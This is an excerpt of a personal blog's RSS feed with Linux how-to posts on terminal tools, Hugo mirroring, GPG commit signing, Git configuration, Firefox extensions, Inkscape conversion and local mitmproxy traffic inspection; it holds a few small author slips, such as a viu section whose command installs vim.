- [Steam Downloads Slow On Linux?! FIX IT](https://iv.datura.network/watch?v=A_kRdad3eb4)
- [Slow steam downloads? Try this!](https://old.reddit.com/r/linux_gaming/comments/16e1l4h/slow_steam_downloads_try_this/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Good Bye 2023: Essential Linux Terminal Tools for Linux Geeks</title><link>https://ummit.dev//posts/linux/tools/geek-tools/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/geek-tools/</guid><description>Collection of powerful command-line tools for Linux including terminal emulators, file managers, and productivity utilities.</description><pubDate>Sun, 31 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Good-bye 2023 :o

Today is January 1, 2024, and this is the first post in 2024 that will be useful for end users.

As we all know, we hardly need Gui in our lives. everything the terminal can do.

First-class basic commands like ls, pwd, cd, lsblk, gdisk, fdisk, ps, pkill... I won&apos;t go into details here... I think you should be familiar with these tools.

BTW, this post just popped into my head on 2023-12-31 at around 11:55. As a useful article for 2024-01-01 :d. Now, Let&apos;s fire up the terminal geek tools :p

### 1. Viu - Visual Image Delight

Viu, a terminal image viewer. Perfect for those moments when you want to sneak a quick peek at images without leaving the command line.

```shell
sudo pacman -S vim
```

![viu](./viu.png)

### 2. Htop and Btop - Task Management Unleashed

Htop and btop are your dynamic duo for advanced task management. Real-time updates and an intuitive interface make monitoring and managing processes a breeze.

```shell
sudo pacman -S htop btop
```

![htop](./htop.png)

### 3. Neovim and Vim - Text Editing Wizards

Neovim and Vim redefine text editing in the terminal. Packed with features and extensibility, they&apos;re more than just text editors—they&apos;re lifestyle choices.

```shell
sudo pacman -S neovim
```

![neovim](./neovim.png)

### 4. LF - File Navigation Bliss
LF, your trusty file manager, simplifies navigating directories with style. Say goodbye to tedious file manipulation and hello to efficiency.

```shell
sudo pacman -S lf
```

![lf](./lf.png)

### 5. Media Magic Trio - FFMPEG, yt-dlp, Inkscape

For multimedia tasks, FFMPEG for conversion, yt-dlp for downloads, and Inkscape for vector graphics are your command-line companions.

```shell
sudo pacman -S ffmpeg yt-dlp inkscape
```

### 6. Zsh and Oh My Zsh - Shell Brilliance
Zsh, the powerhouse shell, gets a boost with Oh My Zsh. Themes, plugins, and a wealth of features turn your terminal into a personalized haven.

```shell
sudo pacman -S zsh
```

### 7. Kitty and Kitten - GPU-Powered Terminal
Kitty, a GPU-based terminal emulator, and its companion Kitten with high-quality display pictures bring modern features and visual appeal to your terminal.

```shell
sudo pacman -S kitty
```

### 8. Ncdu - Disk Space Enlightenment
Ncdu, the disk usage analyzer, transforms complex disk statistics into an interactive and easy-to-understand display.

```shell
sudo pacman -S ncdu
```

![ncdu](./ncdu.png)

### 9. Hollywood - Terminal Fun
Hollywood adds a touch of entertainment with cool effects inspired by movie and TV hacking scenes. It&apos;s not just about productivity; it&apos;s about having fun in the terminal.

```shell
yay -S hollywood
```

![hollywood](./hollywood.png)

## End of 2023

After getting used to using the terminal for everything, a GUI really isn&apos;t necessary anymore :D</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Mirroring Hugo site: with subdomain GitLab and Cloudflare and more</title><link>https://ummit.dev//posts/web/hugo/hugo-mirroring-pages/</link><guid isPermaLink="true">https://ummit.dev//posts/web/hugo/hugo-mirroring-pages/</guid><description>Deploy Hugo static sites across multiple platforms using GitLab Pages and Cloudflare Pages with dynamic baseURL configuration.</description><pubDate>Sun, 31 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

When mirroring your Hugo site with GitLab and Cloudflare, ensuring that the site is fully functional is crucial. The build process depends on the `baseURL` configuration in your Hugo `config.yaml`. To make this work seamlessly, you need to adjust the build command for both GitLab Pages and Cloudflare Pages. This guide walks you through the process.

## Cloudflare Pages

Cloudflare Pages automatically follows your GitLab or GitHub repository. Here are the steps to set it up:

### Step 1: Adding Environment (Optional)

To manage your domain effectively, consider adding an environment variable:

1. Navigate to Worker &amp; Pages -&gt; Settings -&gt; Environment variables.
2. Add the variable:
   - Variable name: `CF_PAGES_URL`
   - Value: Your Cloudflare Pages domain.

### Step 2: Build Command

Adjust the build command to include the `baseURL` when building the Hugo site:

1. Navigate to Builds &amp; Deployments -&gt; Build Configurations -&gt; Edit Configurations.
2. Update the Build command:
   ```shell
   hugo --baseURL $CF_PAGES_URL
   ```
   ![Hugo Build Cloudflare Pages](./CF.png)

## GitLab Pages

For GitLab Pages, you can use CI/CD GitLab Actions. Here is an example of a GitLab CI configuration for Hugo:

```yaml
default:
  image: &apos;${CI_TEMPLATE_REGISTRY_HOST}/pages/hugo:0.121.1&apos;

variables:
  GIT_SUBMODULE_STRATEGY: recursive
  GL_PAGES_URL: domain.com

pages:
  script:
    - hugo -b $GL_PAGES_URL
  artifacts:
    paths:
      - public
  rules:
    - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
  environment: production
```

This configuration ensures that the `baseURL` is correctly set during the Hugo build process for GitLab Pages.

## GitHub

Coming soon ...

```yaml
git:
  depth: false

env:
  global:
    - HUGO_VERSION=&quot;0.121.1&quot;
  matrix:
    - YOUR_ENCRYPTED_VARIABLE

install:
  - wget -q https://github.com/gohugoio/hugo/releases/download/v${HUGO_VERSION}/hugo_${HUGO_VERSION}_Linux-64bit.tar.gz
  - tar xf hugo_${HUGO_VERSION}_Linux-64bit.tar.gz
  - mv hugo ~/bin/

script:
  - hugo -b $GH_PAGES_URL

deploy:
  provider: pages
  skip-cleanup: true
  github-token: $GITHUB_TOKEN
  keep-history: true
  local-dir: public
  repo: gh-username/gh-username.github.io
  target-branch: master
  verbose: true
  on:
  branch: master
```

## Conclusion

By following these steps for both Cloudflare Pages and GitLab Pages, you ensure that your Hugo site is mirrored and built correctly with the specified `baseURL`, resulting in a fully functional and mirrored website.

## References

- [CI/CD YAML syntax reference](https://docs.gitlab.com/ee/ci/yaml/#variables)
- [How to Set Variables In Your GitLab CI Pipelines](https://www.howtogeek.com/devops/how-to-set-variables-in-your-gitlab-ci-pipelines/)
- [Define a CI/CD variable in the .gitlab-ci.yml file](https://docs.gitlab.com/ee/ci/variables/#define-a-cicd-variable-in-the-gitlab-ciyml-file)
- [Deploy with Cloudflare Pages](https://developers.cloudflare.com/pages/framework-guides/deploy-a-hugo-site/#deploy-with-cloudflare-pages)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Editing GPG Key Information</title><link>https://ummit.dev//posts/linux/tools/gpg/gpg-editing-information/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/gpg/gpg-editing-information/</guid><description>Update GPG key details including email addresses, user names, and expiration dates using command-line tools.</description><pubDate>Sun, 31 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

First of all, Happy New Year!! :3 This is the first post for the last day of 2023 :D **2023-12-31**

**Updating Email, User Name, or Expiry Date**: Here&apos;s a simple guide on how to edit details like email, user name, and expiry date.

&gt;**Note:** When updating email information, ensure you add a new email before attempting to delete the old one. This maintains the key&apos;s integrity and allows for a smooth transition.

### **Step 1: Find the Key ID**
   Start by identifying the key ID using the following command:
   ```shell
   gpg --list-secret-keys --keyid-format=long
   ```

### **Step 2: Edit the Key**
   Enter the GPG key editing mode with the key ID:
   ```shell
   gpg --edit-key &lt;ID&gt;
   ```
   On the GnuPG prompt, proceed to the next steps.

### **Step 3: Adding a New Email and Deleting the Old One**
   Inside the GnuPG prompt:
   ```shell
   gpg&gt; adduid
   ```
   Follow the interactive prompts to provide the new details. Confirm and enter the passphrase when prompted. Save the changes:
   ```shell
   gpg&gt; save
   ```
   To delete the old email, ensure you have added a new email first:
   ```shell
   gpg&gt; deluid
   ```

### **Step 4: Updating Expiry Date**
   To change the expiry date:
   ```shell
   gpg&gt; expire
   ```
   Follow the interactive prompts for details. To modify the ssb expiry date, select the uid (for example, uid 1):
   ```shell
   gpg&gt; uid 1
   gpg&gt; expire
   ```
   Adjust the date and save:
   ```shell
   gpg&gt; save
   ```

### **Step 5: Verify Changes**
   Confirm that the changes are correct by checking the signed commit messages:
   ```shell
   git log --show-signature
   ```

## Conclusion

This step-by-step guide you to confidently navigate the process of editing GPG key information, whether you need to update your email, user name, or expiry date.

## Reference

- [Can I add an email address to an existing GPG key?](https://security.stackexchange.com/questions/261467/can-i-add-an-email-address-to-an-existing-gpg-key)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Mirroring Codeberg, Gitea, Gitlab and Github Workflows</title><link>https://ummit.dev//posts/linux/tools/git/git-devsecops-mirroring/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/git/git-devsecops-mirroring/</guid><description>Set up automated repository mirroring between GitHub, GitLab, Codeberg, and other Git platforms for redundancy.</description><pubDate>Thu, 28 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Setting up a mirrored repository simplifies collaboration and enhances version control. Here&apos;s a straightforward guide to help you get started:

&gt;This aritcle force on my workflow. Codeberg mainly repository and the gitlab mirror repository. But with others, just some differtent, you can easily find out the section.

### Step 1 - Generate an Access Token

Obtain an access token key from your target DevSecOps platform, such as GitLab, GitHub, or others. For GitHub, you can use [this URL](https://gitlab.com/-/user_settings/personal_access_tokens). Ensure that the token has all the necessary scopes, considering this repository is under your full control.

### Step 2 - Configure Mirror Settings

Navigate to the settings of your existing code repository on Codeberg. Look for the `Mirror Setting` section.

- **Git Remote Repository URL:** Provide the remote URL of your empty mirror repository.
- **Authorization:** Enter the username of your mirror repository and the access token key associated with the account.
- **Sync when commits are pushed:** Enable this option for automatic synchronization when commits are pushed to the source repository.
- **Mirror Interval:** Choose a suitable interval for syncing. The default is often set to 8 hours.

![Mirror-Setting](./Mirror-Settings.png)

### Step 3 - Add Push Mirror

Once you&apos;ve ensured that all the information is correct, click on &quot;Add Push Mirror.&quot;

### Step 4 - Initiate Synchronization

Click `Synchronize` to force a sync for the first time. Be patient and wait a few minutes.

### Step 5 - Verification

Check your GitLab mirror repository. You should observe the source tree syncing with the mirrored repository, indicating a successful setup.

Now, with these steps, you&apos;ve established a mirrored repository, enhancing the efficiency of your DevSecOps workflow. Enjoy seamless collaboration and version control!

## Conclusion

Remember. The place where you have the code is where you enter the password you need for your other DevSecOps account. Once you have entered it correctly, remember to go back to the mirror setting to check the status. If there are any errors, you will get a corresponding error. So you might have entered the wrong value. Just check it again.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Git: Secure Committing with GPG</title><link>https://ummit.dev//posts/linux/tools/git/git-signing-commit/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/git/git-signing-commit/</guid><description>Set up GPG key signing for Git commits to verify authenticity and enhance repository security.</description><pubDate>Wed, 27 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Ensure the security of your commits by following these simple steps to set up GPG key signing. Add an extra layer of protection to your Git repositories with this quick and easy guide.

### Step 1: Install Necessary Packages

Start by installing the required packages, GnuPG, and pinentry:

```shell
sudo pacman -S gnupg pinentry
```

### Step 2: Generate a GPG Keypair

Generate a GPG keypair with the following command. Follow the prompts and enter information consistent with your GitHub/GitLab/Codeberg/Gitea account:

```shell
gpg --full-generate-key
```

- Choose RSA for enhanced security.
- Opt for a key size of 4096 for better security.
- Set the key expiration (0 for no expiration).
- Enter information matching your account details.
- Set a passphrase for the GPG keys.

### Step 3: Retrieve the Public Key

Get your GPG key&apos;s information using the following command:

```shell
gpg --list-secret-keys --keyid-format LONG
```

Copy the GPG key ID (the `sec` value, not `ssb`). Now, obtain the PGP Public Key:

```shell
gpg --armor --export &lt;GPG_KEY_ID&gt;
```

Copy the displayed GPG Public key.

### Step 4: Add GPG Key to Your Account

For Git repositories, the steps are essentially the same. Log in to your account, navigate to the GPG section, and paste the GPG Key.

### Step 5: Verify Your Public GPG Key

In the same section, find a &quot;Verify&quot; button. Copy the provided command line, paste it into your terminal, copy the output, and paste it back into the verification section. Your GPG Key should now be verified.

### Step 6: TTY Session

Before proceeding, ensure the active session can use the GPG key, Add into `~/.zshrc`:

```shell
export GPG_TTY=$(tty)
```

### Step 7: Git Configuration Setup

Configure Git to use your GPG key:

```shell
git config --global user.signingkey &lt;GPG_KEY_ID&gt;
git config --global commit.gpgSign true
```

Replace `&lt;GPG KEY ID&gt;` with your actual GPG key ID.

### Step 8: Commit a Message

When committing, Git will prompt for the passphrase associated with your GPG key, adding an extra layer of security:

```shell
git commit -S -m &quot;commit message&quot;
```

Ensure this commit is made with the corresponding Public Key.

## References

- [7.4 Git Tools - Signing Your Work](https://git-scm.com/book/en/v2/Git-Tools-Signing-Your-Work)
- [Unable to generate a key with GnuPG (agent_genkey failed: No such file or directory)](https://superuser.com/questions/1660466/unable-to-generate-a-key-with-gnupg-agent-genkey-failed-no-such-file-or-direct)
- [Adding a GPG key to your account](https://docs.codeberg.org/security/gpg-key/)
- [gnupg2: gpg: public key decryption failed: Inappropriate ioctl for device #14737](https://github.com/Homebrew/homebrew-core/issues/14737)
- [GnuPG](https://wiki.archlinux.org/title/GnuPG)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Firefox Plug-ins for Enhanced your appearance of your browser</title><link>https://ummit.dev//posts/browser/extensions/web-extensions-theme/</link><guid isPermaLink="true">https://ummit.dev//posts/browser/extensions/web-extensions-theme/</guid><description>Customize Firefox appearance with themes and dark mode extensions for comfortable browsing experience.</description><pubDate>Tue, 26 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Today, we will explore plug-ins that can enhance the aesthetics of your browser. Aka themes and color schemes.

### [Firefox Color](https://addons.mozilla.org/zh-TW/firefox/addon/firefox-color/)

Create a unique and visually appealing look for your Firefox browser with Firefox Color. This plug-in allows you to easily build, save, and share beautiful themes. Customize colors and elements to transform your browser into your preferred style.

See the source code on [GitHub](https://github.com/mozilla/FirefoxColor).

![Firefox Color](https://addons.mozilla.org/user-media/previews/full/216/216725.png?modified=1622133685)

### [Dark Reader](https://addons.mozilla.org/en-US/firefox/addon/darkreader/)

Aka Dark Mode only. For those who prefer a darker interface like me. Dark Reader is a popular plug-in that enables dark mode on websites, reducing eye strain and enhancing readability. It offers customizable settings to adjust brightness, contrast, and sepia levels to suit your preferences.

See the source code on [GitHub](https://github.com/darkreader/darkreader).

![Dark Reader](https://addons.mozilla.org/user-media/previews/full/201/201070.png?modified=1638883247)

## Conclusion

Your eye health is important, and these plug-ins can help you create a visually comfortable browsing experience. Whether you prefer a dark mode or a custom theme :)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Converting SVG to PNG with Inkscape</title><link>https://ummit.dev//posts/linux/tools/inkscape/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/inkscape/</guid><description>Convert SVG vector graphics to PNG format using Inkscape command-line tools with custom dimensions.</description><pubDate>Tue, 26 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you&apos;re looking to convert SVG (Scalable Vector Graphics) files to PNG (Portable Network Graphics) format, ImageMagick provides a powerful and straightforward solution. In this guide, we&apos;ll explore a simple command-line approach using Inkscape, a vector graphics editor, to achieve this conversion.

## Prerequisites

using the following commands to install :

```shell
sudo pacman -S inkscape
```

## SVG to PNG Conversion

To convert an SVG file to PNG using ImageMagick with Inkscape, use the following command:

```shell
inkscape -w 1024 -h 1024 input.svg -o output.png
```

- **-w**: Specifies the width of the output PNG file (1024 pixels in this example).
- **-h**: Specifies the height of the output PNG file (1024 pixels in this example).
- **input.svg**: The input SVG file you want to convert.
- **-o output.png**: The name of the output PNG file.

Adjust the width and height values according to your preferences. This command preserves the aspect ratio of the original SVG file.

## Example

Let&apos;s say you have an SVG file named `example.svg`. To convert it to a 1024x1024 PNG file, run:

```shell
inkscape -w 1024 -h 1024 example.svg -o example.png
```

This command will generate a PNG file (`example.png`) with a width and height of 1024 pixels each.

## Batch Conversion

For batch processing multiple SVG files, you can use a loop in the command line or a script. For instance, using a loop in shell:

```shell
for file in *.svg; do
    inkscape -w 1024 -h 1024 &quot;$file&quot; -o &quot;${file%.svg}.png&quot;
done
```

This loop iterates through all SVG files in the current directory, converts each to a 1024x1024 PNG file, and appends `.png` to the output filenames.

## Conclusion

With this straightforward approach, you can effortlessly convert SVG files to PNG using ImageMagick and Inkscape, providing you with the flexibility to tailor the output dimensions to your specific needs.

## Reference

- [How to convert a SVG to a PNG with ImageMagick?](https://stackoverflow.com/questions/9853325/how-to-convert-a-svg-to-a-png-with-imagemagick)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Structuring and Preparing Your Blog for Hugo Themes</title><link>https://ummit.dev//posts/web/hugo/merge-into-good-markdown-structure/</link><guid isPermaLink="true">https://ummit.dev//posts/web/hugo/merge-into-good-markdown-structure/</guid><description>Organize and restructure blog content for Hugo theme migration with proper file naming and thumbnail management.</description><pubDate>Tue, 26 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

When transitioning to a new Hugo theme, it&apos;s essential to have a well-organized blog structure. This guide will help you merge all your files into a format suitable for the new Hugo theme.

## Step 1: Renaming Markdown Files

Start by renaming all your Markdown files to `index.md` for a cleaner structure. Execute the following command in your blog&apos;s root directory:

```bash
find . -type f -name &quot;*.md&quot; -exec bash -c &apos;mv &quot;$0&quot; &quot;${0%/*}/index.md&quot;&apos; {} \;
```

This simplifies your file structure and aligns it with Hugo&apos;s expectations.

## Step 2: Managing Thumbnails

For thumbnails, ensure they are named as `featured.*` for compatibility with your Hugo theme. If your `index.md` files include URLs for thumbnails, you can use the following script to download and rename them:

```bash
#!/bin/bash

find . -type f -name &quot;index.md&quot; -exec awk &apos;NR&lt;=10 &amp;&amp; /thumbnail: .+/{print $2, FILENAME}&apos; {} \; | while read -r url filepath; do
    if [[ $url == https* ]]; then
        url=$(echo &quot;$url&quot; | tr -d &apos;[:space:]&apos;)
        filename=$(basename &quot;$url&quot;)
        dirpath=$(dirname &quot;$filepath&quot;)

        cd &quot;$dirpath&quot; || exit
        wget &quot;$url&quot; -O &quot;./featured.${filename##*.}&quot;

        if [ $? -eq 0 ]; then
            echo &quot;Downloaded and renamed to featured.${filename##*.}&quot;
        else
            echo &quot;Failed to download $filename&quot;
        fi

        cd - || exit
    else
        echo &quot;Skipping non-HTTPS URL: $url&quot;
    fi
done
```

&gt;Note: Place this script in your blog&apos;s root directory and run it to download and rename the thumbnails.

And Please check out the file, is it what you expected? Since this script might be overwrite your current file.

## Step 3: Verify and Adjust

Review your blog&apos;s content and ensure all links, images, and references are intact. Adjust any broken links or missing images.

## Step 4: Test with the New Theme

Finally, test your blog with the new Hugo theme. Use Hugo&apos;s built-in server for local testing:

```bash
hugo server --watch --loglevel debug
```

Visit `http://localhost:1313` in your browser to see how your blog looks with the new theme.

## Source code

The source code for these can also be found in my repositories! Please check out: https://codeberg.org/UmmIt/Markhugo</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Git: Configurations Settings</title><link>https://ummit.dev//posts/linux/tools/git/git-global-local-settings/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/git/git-global-local-settings/</guid><description>Manage Git global and local configurations for different identities across multiple repositories and projects.</description><pubDate>Tue, 26 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

When working with Git, managing configurations is crucial for a seamless development experience. This guide explores setting up local and global configurations and provides a list of configurations for your reference.

## Global Configuration

Global configurations apply to all repositories on your machine. They are useful for providing default identities for repositories without a local configuration. Set up global configurations with the following commands:

```shell
git config --global user.name &quot;Username&quot;
git config --global user.email &quot;email@email.com&quot;
```

Replace `Username` and `email@email.com` with the desired global username and email address.

## Local Configuration

Local configurations are specific to a particular Git repository. To set up a local configuration for a repository, navigate to the repository&apos;s directory and run the following commands:

```shell
git config --local user.name &quot;Username&quot;
git config --local user.email &quot;email@email.com&quot;
```

Replace `Username` and `email@email.com` with the desired local username and email address for the repository.

### Verify Configurations

To confirm your configurations, you can use the following commands:

```shell
git config --local --get user.name
git config --local --get user.email
```

Use `--global` instead of `--local` to check the global configurations:

```shell
git config --global --get user.name
git config --global --get user.email
```

### Full Config List

To view the complete list of configurations, use:

```shell
git config --list
```

This command displays all configurations, including user name, email, aliases, and other settings.

## Conclusion

Now, when you work on a specific repository, Git will use the local configuration for that repository. For other repositories or situations where a local configuration is not available, Git will fall back to the global configuration.

This setup is handy when contributing to projects with different identities. Adjust the local configurations for each repository, and global configurations will serve as the default for repositories without a specific local configuration.

By following these steps and referring to the full config list, you can easily manage and switch between different identities when working on multiple Git repositories.

## Reference

- [How can I config two different git repo with different credentials in one system?](https://stackoverflow.com/questions/43118543/how-can-i-config-two-different-git-repo-with-different-credentials-in-one-system/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Firefox Plug-ins for Enhanced Developer Productivity</title><link>https://ummit.dev//posts/browser/extensions/web-extensions-dev/</link><guid isPermaLink="true">https://ummit.dev//posts/browser/extensions/web-extensions-dev/</guid><description>Essential Firefox extensions for developers including cookie management, custom styling, and technology detection tools.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In this guide we will explore the useful browser plug-ins that can enhance the productivity and efficiency of developers. These plug-ins can be very beneficial for you whether you wish to manage cookies, customize web pages, or analyze the technologies used on a website.

### [Cookie Quick Manager](https://addons.mozilla.org/zh-TW/firefox/addon/cookie-quick-manager/)

Cookie Quick Manager is a plug-in designed to manage cookies effectively. It offers features such as viewing, searching, creating, editing, deleting, backing up, restoring, and preventing deletion of cookies.

See the source code on [GitHub](https://github.com/ysard/cookie-quick-manager).

![Cookie Quick Manager](https://addons.mozilla.org/user-media/previews/full/211/211223.png?modified=1622132875)

### [Stylus](https://addons.mozilla.org/zh-TW/firefox/addon/styl-us/)

Stylus is a plug-in that allows you to redesign your favorite web pages. Whether installing a custom theme from an online repository or creating, editing, and managing personalized CSS stylesheets, Stylus provides granular control over the appearance of web pages.

See the source code on [GitHub](https://github.com/openstyles/stylus/).

![Stylus](https://addons.mozilla.org/user-media/previews/full/184/184538.png?modified=1622132703)

### [Wappalyzer](https://addons.mozilla.org/zh-TW/firefox/addon/wappalyzer/)

Wappalyzer is a powerful tool for identifying the technologies and frameworks used on a website. It aids developers in quickly understanding the technical components of a site.

&gt;IMPORTANT: Wappalyzer seems to became paid service and no longer avilavble source code on GitHub. But you can still use the free version.

![Wappalyzer](https://addons.mozilla.org/user-media/previews/thumbs/125/125386.jpg?modified=1622132463)

### [Tampermonkey](https://addons.mozilla.org/zh-TW/firefox/addon/tampermonkey/)

Tampermonkey is a customizable user script manager that allows you to add custom JavaScript to web pages. It can be used to enhance the functionality of websites, automate tasks, and modify the appearance of pages.

&gt;IMPORTANT: As my research, Tampermonkey is not open source, the lastest source code of Github that i found is only available to 2018. `Commits on Jun 5, 2018` So its to say that is closed source.

![Tampermonkey](https://addons.mozilla.org/user-media/previews/thumbs/170/170870.jpg?modified=1622132485)

## Conclusion

These browser plug-ins can significantly improve the browsing experience for developers by providing tools for managing cookies, customizing web pages, and analyzing the technologies used on websites.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Firefox Plug-ins for Enhanced your Browsing Experience with extra features</title><link>https://ummit.dev//posts/browser/extensions/web-extensions-others/</link><guid isPermaLink="true">https://ummit.dev//posts/browser/extensions/web-extensions-others/</guid><description>Practical Firefox extensions for everyday browsing including tab management, image search, and YouTube enhancements.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Today, we will explore a selection of browser plug-ins that can enhance your browsing experience. These plug-ins offer a range of features, from managing tabs and sessions to customizing web pages and analyzing website technologies. Let&apos;s dive in and discover how these plug-ins can improve your browsing efficiency and productivity.

### [Imagus](https://addons.mozilla.org/zh-TW/firefox/addon/imagus/)

Imagus enhances your browsing experience by allowing you to enlarge thumbnails on mouseover and view images/videos from links without clicking or opening a new page.

See the source code on [GitHub](https://github.com/Zren/chrome-extension-imagus).

![Imagus](https://addons.mozilla.org/user-media/previews/thumbs/126/126064.jpg?modified=1622132363)

### [Search by Image](https://addons.mozilla.org/zh-TW/firefox/addon/search_by_image/)

This robust image search tool supports multiple search engines, enabling you to search for information through images. Simply upload images or provide image URLs to find relevant information.

See the source code on [GitHub](https://github.com/dessant/search-by-image).

![Search by Image](https://addons.mozilla.org/user-media/previews/full/263/263054.png?modified=1635854423)

### [Simple Tab Groups](https://addons.mozilla.org/zh-TW/firefox/addon/simple-tab-groups/)

Organize and manage your browser tabs efficiently with Simple Tab Groups. Create, modify, and swiftly switch between different tab groups to enhance your work efficiency.

See the source code on [GitHub](https://github.com/drive4ik/simple-tab-groups).

![Simple Tab Groups](https://addons.mozilla.org/user-media/previews/thumbs/209/209871.jpg?modified=1622132830)

### [Tab Session Manager](https://addons.mozilla.org/zh-TW/firefox/addon/tab-session-manager/)

Save and restore the state of windows and tabs effortlessly with Tab Session Manager. It supports auto-save and cloud sync, simplifying the management of your browsing sessions.

See the source code on [GitHub](https://github.com/sienori/Tab-Session-Manager).

![Tab Session Manager](https://addons.mozilla.org/user-media/previews/thumbs/224/224507.jpg?modified=1622132782)

### [Tabby - Window Tab Manager](https://addons.mozilla.org/zh-TW/firefox/addon/tabby-window-tab-manager/)

Tabby streamlines the management of numerous windows and tabs. Quickly open, close, move, and pin tabs. For those who frequently work with 100+ tabs, Tabby is a must-have.

See the source code on [GitHub](https://github.com/Bill13579/tabby).

![Tabby](https://addons.mozilla.org/user-media/previews/thumbs/240/240529.jpg?modified=1622133220)

### [Undo Close Tab](https://addons.mozilla.org/zh-TW/firefox/addon/undoclosetabbutton/)

Restore recently closed tabs with a single click using Undo Close Tab. It provides a convenient context menu with a list of recently closed tabs.

See the source code on [GitHub](https://github.com/M-Reimer/undoclosetab).

### [Youtube Audio](https://addons.mozilla.org/en-US/firefox/addon/youtube-audio/)

Disable video and only play audio from YouTube videos with Youtube Audio. This plug-in is perfect for listening to music or podcasts without the need to watch the video.

See the source code on [GitHub](https://github.com/animeshkundu/youtube-audio).

![Youtube Audio](https://addons.mozilla.org/user-media/previews/full/179/179540.png?modified=1622132573)

### [YouTube NonStop](https://addons.mozilla.org/en-US/firefox/addon/youtube-nonstop)

YouTube NonStop automatically skips the &quot;Pause video. Continue watching?&quot; dialog, allowing you to watch YouTube videos without interruptions.

See the source code on [GitHub](https://github.com/lawfx/YoutubeNonStop).

![YouTube NonStop](https://addons.mozilla.org/user-media/previews/thumbs/209/209112.jpg?modified=1622133496)

## Conclusion

These browser plug-ins offer a variety of features to enhance your browsing experience. Whether you&apos;re looking to manage tabs, search for images, or streamline your browsing sessions, these plug-ins can help you work more efficiently and effectively. Try them out and discover how they can improve your browsing productivity.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Setting Up mitmproxy with Network Traffic Analysis</title><link>https://ummit.dev//posts/linux/tools/mitmproxy/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/mitmproxy/</guid><description>Intercept and analyze HTTP and HTTPS network traffic between browsers and servers using mitmproxy.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

mitmproxy allows you to intercept and analyze network traffic between your browser and the internet. To set up mitmproxy with Firefox, you need to configure Firefox to use mitmproxy as a proxy. This enables mitmproxy to capture and display all HTTP and HTTPS requests made by Firefox.

## Downloading mitmproxy

1. Visit the official website at: https://mitmproxy.org/
2. Download the Linux Binary file.
3. Extract the tar.gz file with this command:

```shell
tar -xvf mitmproxy-10.1.6-linux-x86_64.tar.gz
```

### Firefox - Proxy Configuration

1. Open Firefox and go to the settings menu by clicking on the three horizontal lines in the upper right corner.

2. Select `Preferences` or `Options` from the menu.

3. In the Preferences or Options window, find and click on `General` in the left sidebar.

4. Scroll down to the `Network Settings` section.

5. Click on the `Settings...` button next to `Configure how Firefox connects to the internet.`

6. In the Connection Settings window, select `Manual proxy configuration.`

7. For both `HTTP Proxy` and `HTTPS Proxy,` enter the value `127.0.0.1` and set the port to `8080`. The `SOCKS Host` just ignore.

&gt; Tips: Or just Set `Also use this proxy for HTTPS.`

9. Click `OK` to close the Connection Settings window.

### Running mitmproxy

There has a few options to use mitmproxy. I recommend use `mitmdump` for the terminal.

1. Open a terminal.

2. Navigate to the directory where mitmproxy is installed.

    ```shell
    cd mitmproxy-bin
    ```

3. Run mitmproxy by executing the following command:

   ```shell
   ./mitmdump
   ```

4. mitmproxy will start, and you will see information about the proxy, including the proxy address (e.g., `http://127.0.0.1:8080`).

5. restart firefox.

#### Viewing Traffic in mitmproxy**

Try to browse the internet in Firefox (launch browser), mitmproxy will capture and display the traffic in the terminal where mitmproxy is running.

For instance:

```shell
❯ ./mitmdump
[04:16:58.699] HTTP(S) proxy listening at *:8080.
[04:18:41.772][127.0.0.1:54868] client connect
[04:18:41.774][127.0.0.1:54876] client connect
[04:18:41.884][127.0.0.1:54868] server connect github.com:443 (20.27.177.113:443)
```

#### Exit mitmproxy

To exit mitmproxy, press `Ctrl + C` in the terminal where mitmproxy is running.

## Conclusion

By following these steps, you have successfully configured Firefox to use mitmproxy as a proxy, allowing you to monitor and analyze the network traffic generated by your browser.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Copying Text to Clipboard with xclip in Linux</title><link>https://ummit.dev//posts/linux/tools/xclip/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/xclip/</guid><description>Use xclip command-line utility to efficiently copy file contents to clipboard in Linux terminal environments.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded># Overview

